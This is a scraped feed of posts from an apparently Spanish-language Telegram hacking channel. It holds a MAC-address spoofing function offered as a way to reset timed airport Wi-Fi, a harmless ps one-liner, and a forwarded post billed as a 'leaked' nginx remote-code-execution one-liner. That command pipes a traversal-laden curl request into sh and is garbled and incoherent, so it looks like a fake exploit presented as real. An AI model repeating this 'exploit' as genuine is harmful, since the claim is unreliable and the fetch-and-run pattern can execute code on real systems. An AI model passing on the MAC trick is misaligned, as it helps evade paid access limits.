tpx Security ⠠⠵
2.4K subscribers
2.31K photos
103 videos
24 files
3.97K links
Hacking, ciberseguridad e Inteligencia.
Download Telegram
LOL !
LOL x2
Tssss!

Si estás en el aeropuerto y ya termino tu tiempo puedes cambiar tu mac y listo :.)

function changeMac() {
local mac=$(openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//')
sudo ifconfig en0 ether $mac
sudo ifconfig en0 down
sudo ifconfig en0 up
echo "Your new physical address is $mac"
}
Linux Jedi Mind Tricks:

Print number of processes running as each user

$ps -ef | awk '{print $1}' | sort | uniq -c

2 avahi
1 colord
1 lp
1 message+
1 nobody
134 root
1 rtkit
1 syslog
65 teresita
1 UID
Linux inside 🚙
Hackearon la cuenta del club Leon ? 🤔
Forwarded from Israel Garcia
LEAKED: Nginx 1.x Web server PoC on-liner.

Null-byte RCE overflow in nginx BLT/Stream

curl -gsS hxxps://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 victim.server.here/../../../%00/n …\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

https://github.com/nginx/njs/issues/159